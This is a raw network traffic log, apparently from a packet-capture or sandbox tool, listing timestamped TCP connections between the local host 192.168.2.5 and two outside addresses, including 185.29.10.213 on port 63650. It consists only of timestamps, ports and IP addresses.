                                                                                          Dec 4, 2024 06:37:12.456849098 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.456866026 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.457021952 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.466937065 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.466953993 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.467046022 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.467060089 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.467150927 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.474936008 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.474955082 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.475019932 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.475033998 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.475874901 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.481453896 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.481468916 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:12.481532097 CET49813443192.168.2.5104.21.13.139
                                                                                          Dec 4, 2024 06:37:12.481544971 CET44349813104.21.13.139192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.967670918 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.967729092 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:21.972420931 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.972536087 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.972589970 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:21.977212906 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.977333069 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.977395058 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:21.982038021 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.982131958 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.982181072 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:21.986840963 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.986983061 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:21.987041950 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:21.991372108 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.040045977 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.040096045 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.040134907 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.042088985 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.042130947 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.042174101 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.046242952 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.046315908 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.046343088 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.050365925 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.050452948 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.050489902 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.054533005 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.054588079 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.054594994 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.058635950 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.058684111 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.058727980 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.062745094 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.062793016 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.062840939 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.066915989 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.066956997 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.067002058 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.071031094 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.071070910 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.071146011 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.075187922 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.075231075 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.075272083 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.079320908 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.079355955 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.079384089 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.121800900 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.137064934 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.137191057 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.137252092 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.138243914 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.138374090 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.138428926 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.140638113 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.140739918 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.140779972 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.143026114 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.143125057 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.143172979 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.145426035 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.145530939 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.145587921 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.147810936 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.147908926 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.147954941 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.150276899 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.150324106 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.150368929 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.152621984 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.152806997 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.152851105 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.155045986 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.155184031 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.155226946 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.157402992 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.157566071 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.157618999 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.159785032 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.159945011 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.159990072 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.162178040 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.162280083 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.162328005 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.164572954 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.164688110 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.164756060 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.166960001 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.167004108 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.167054892 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.169363022 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.169472933 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.169511080 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.171739101 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.171835899 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.171916962 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.174134970 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.174267054 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.174427032 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.176539898 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.176671028 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.176721096 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.178920984 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.179028034 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.179083109 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.181305885 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.181417942 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.181469917 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.183682919 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.183731079 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.183773041 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.186106920 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.186224937 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.186271906 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.188498974 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.188611984 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.188657045 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.190907001 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.191015959 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.191066980 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.193281889 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.193373919 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.193420887 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.257339001 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.257481098 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.257565022 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.257951021 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.258050919 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.258097887 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.260343075 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.260473967 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.260523081 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.262742996 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.262859106 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.262904882 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.265132904 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.265250921 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.265304089 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.267545938 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.267740011 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.267811060 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.269962072 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.270045042 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.270092010 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.272310972 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.272430897 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.272475958 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.274720907 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.274818897 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.274864912 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.277098894 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.277194977 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.277236938 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.279499054 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.279618979 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.279663086 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.281898975 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.282016039 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.282064915 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.284280062 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.284398079 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.284440041 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.286689997 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.286786079 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.286955118 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.289066076 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.289161921 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.289258003 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.291452885 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.291578054 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.291627884 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.293854952 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.294017076 CET6365049840185.29.10.213192.168.2.5
                                                                                          Dec 4, 2024 06:37:22.294060946 CET4984063650192.168.2.5185.29.10.213
                                                                                          Dec 4, 2024 06:37:22.295684099 CET6365049840185.29.10.213192.168.2.5
Timestamp                           Source Port  Dest Port  Source IP      Dest IP
Dec 4, 2024 06:37:22.295732021 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.295778990 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.297487974 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.297602892 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.297657013 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.299268007 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.299370050 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.299415112 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.301019907 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.301151991 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.301204920 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.302761078 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.302865982 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.302913904 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.347563028 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.347666025 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.347723961 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.348247051 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.348337889 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.348375082 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.349431992 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.349572897 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.349611044 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.350996017 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.351118088 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.351160049 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.352535963 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.352663994 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.352703094 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.354113102 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.354222059 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.354259968 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.355710983 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.355767965 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.355804920 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.357212067 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.357338905 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.357384920 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.358768940 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.358891964 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.358932018 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.360307932 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.360435009 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.360470057 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.361854076 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.361959934 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.361995935 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.363408089 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.363502026 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.363548040 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.364963055 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.365073919 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.365114927 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.366509914 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.366635084 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.366673946 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.368063927 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.368310928 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.368361950 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.369626045 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.369720936 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.369762897 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.371191978 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.371306896 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.371344090 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.372725964 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.372829914 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.372874975 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.374269009 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.374406099 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.374449015 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.375850916 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.375968933 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.376013041 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.377403021 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.377463102 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.377509117 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.378978014 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.379168034 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.379208088 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.380495071 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.380592108 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.380633116 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.382055044 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.382158995 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.382206917 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.383595943 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.383702040 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.383748055 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.385157108 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.385327101 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.385369062 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.386702061 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.386802912 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.386846066 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.388370037 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.388457060 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.388506889 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.389780045 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.389854908 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.389897108 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.391364098 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.434317112 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.460921049 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.461016893 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.461091042 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.461649895 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.461746931 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.463191032 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.463246107 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.463289022 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.463339090 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.464740992 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.464946032 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.465003967 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.466288090 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.466396093 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.467624903 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.467839003 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.467946053 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.469638109 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.469682932 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.469696999 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.469738960 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.470959902 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.471000910 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.471052885 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.472485065 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.472544909 CET  63650        49840      185.29.10.213  192.168.2.5
Dec 4, 2024 06:37:22.472593069 CET  49840        63650      192.168.2.5    185.29.10.213
Dec 4, 2024 06:37:22.474033117 CET  63650        49840      185.29.10.213  192.168.2.5
